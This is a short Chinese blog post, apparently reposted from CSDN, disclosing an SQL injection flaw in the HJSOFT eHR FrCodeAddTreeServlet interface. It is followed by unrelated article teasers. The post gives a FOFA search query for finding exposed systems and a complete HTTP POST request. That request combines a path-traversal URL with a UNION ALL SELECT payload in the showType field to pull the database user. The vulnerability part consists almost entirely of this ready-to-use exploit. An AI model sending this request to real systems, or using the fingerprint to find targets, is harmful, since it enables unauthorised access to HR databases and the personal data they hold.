宏景-eHR-frcodeaddtreeservlet接口存在SQL注入

article2024/11/24 11:09:02/文章来源:https://blog.csdn.net/waxcj/article/details/135894970

指纹特征

FOFA：icon_hash="947874108" || body='<div class="hj-hy-all-one-logo"' || app="HJSOFT-HCM"

漏洞复现

POST /templates/attestation/../../servlet/FrCodeAddTreeServlet HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 154

params=&issuperuser=&parentid=&privType=&manageprive=&action=&target=&showType=1' UNION ALL SELECT user,NULL,NULL,NULL,NULL,NULL-- fNwL&treetype=&orgtype=

在这里插入图片描述

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：/a/353872.html

如若内容造成侵权/违法违规/事实不符，请联系我们进行投诉反馈qq邮箱809451989@qq.com，一经查实，立即删除！

精品基于Uniapp+ssm宠物时光管理系统App

《[含文档PPT源码等]精品基于Uniappssm宠物时光管理系统App》该项目含有源码、文档、PPT、配套开发软件、软件安装教程、项目发布教程、包运行成功！ 软件开发环境及开发工具： 开发语言：Java 后台框架：ssm 安卓框架&#xff1a…

游戏开发丨基于Pygame的贪吃蛇小游戏

文章目录写在前面需求分析程序设计程序分析运行结果系列文章写在后面写在前面本期内容基于pygame的贪吃蛇小游戏所需环境 pythonpycharm或anacondapygame 下载地址 https://download.csdn.net/download/m0_68111267/88789657 需求分析本游戏使用Pygame模块开发&a…

Go 知识chan

Go 知识chan 1. 基本知识1.1 定义1.2 操作1.3 操作限定1.4 chan 读写 2. 原理2.1 数据结构2.2 环形队列2.3 等待队列2.4 类型消息2.5 读写数据2.6 关闭chan 3. 使用3.1 操作符使用3.2 select3.3 for-range https://a18792721831.github.io/ 1. 基本知识 chan是go里面里面提供…

ssh异常报错：Did not receive identification string from

一、问题描述某次外出在异地工作场所xshell炼乳远程服务器时，报错：Connection closed by foreign host. D，服务器查看secure日志或sshd服务状态会显示：id not receive identification string from client_ip; 二、分析处理 1&a…

综合案例 - 商品列表

文章目录需求说明1.my-tag组件封装（完成初始化）2.may-tag封装（控制显示隐藏）3.my-tag组件封装（v-model处理：信息修改）4.my-table组件封装（整个表格）①数据不能写死&…

修复idea,eclipse ,clion控制台中文乱码

控制台乱码问题主要原因并不在编译器IDE身上，还主要是Windows的控制台默认编码问题。。。 Powershell，cmd等默认编码可能不是UTF-8，无需改动IDE的settings或者properties（这治标不治本），直接让Windows系统…

编写nginx脚本，安装失败

这是我写的nginx脚本-（正确的，已经修改过的） 这是我在运行脚本是出现的问题这是我在nginx官网上粘贴的内容，请注意我用红笔画的地方，与第一张我写的脚本图片作对比，会发现多出现两个转义符号\。第二幅图就…

Axolotl：一款极简的大模型微调（Finetune）开源框架

今天给大家分享一款工具，Axolotl[1] 是一个旨在简化各种AI模型的微调过程的工具，支持多种配置和架构。特点： 可训练各种 Huggingface 模型，如 llama、pythia、falcon、mpt支持 fullfinetune、lora、qlora、relora 和 gptq使用简…

Linux GPIO模拟SPI接口介绍

一. 前言上次通过GPIO模拟IIC的驱动一块0.98英寸的OLED后，想着下次用下GPIO模拟SPI接口试下。本文会介绍怎么用GPIO模拟SPI接口的方式为设备添加一块spi nor flash，flash模块如下图所示： 上图是一个spi nor模块，上面焊接了W25Q32…

acwing周赛140 b题

思路：我们按照从小到大的顺序将数组逆转好，然后枚举数组首项，分别让其1，-1，0，然后求出公差，从前往后遍历即可。代码： int ans1(){//不动int cha (a[n] - a[1] 1) / (n - 1);int…

原创改进 | 融合蝠鲼觅食与联想学习的量子多目标灰狼优化算法(Matlab)

前面的文章里作者介绍了多目标灰狼优化算法(Multi-Objective Grey Wolf Optimizer，MOGWO)，该算法是由Mirjalili等(灰狼算法的提出者)于2016年提出[1]，发表在中科院一区期刊《expert systems with applications》。 MOGWO保留了灰狼算法的种…

无际线复选框

效果演示实现了一个网格布局，其中每个网格是一个复选框，可以选择是否显示。每个复选框都有一个漂浮的天花板，表示它是一个房间的天花板。每个房间的天花板都有一个不同的形状和颜色，分别对应不同的房间。整个页面的背景是一个由两…

小米13utltra激活冰箱

安装adb驱动https://www.jianshu.com/p/6c41d34d9202 直接下载使用连接上小米手机,退出账号,关闭锁屏密码,打开usb调试,usb调试(安全设置) adb shell dpm set-device-owner com.catchingnow.icebox/.receiver.DPMReceiver如果显示Success，则您已成功激活冰箱。 …

完整代码： import torch import torch.nn as nn from einops import rearrange def conv_1x1_bn(inp, oup):return nn.Sequential(nn.Conv2d(inp, oup, 1, 1, 0, biasFalse),nn.BatchNorm2d(oup),nn.SiLU()) def conv_nxn_bn(inp, oup, kernal_size3, stride1):re…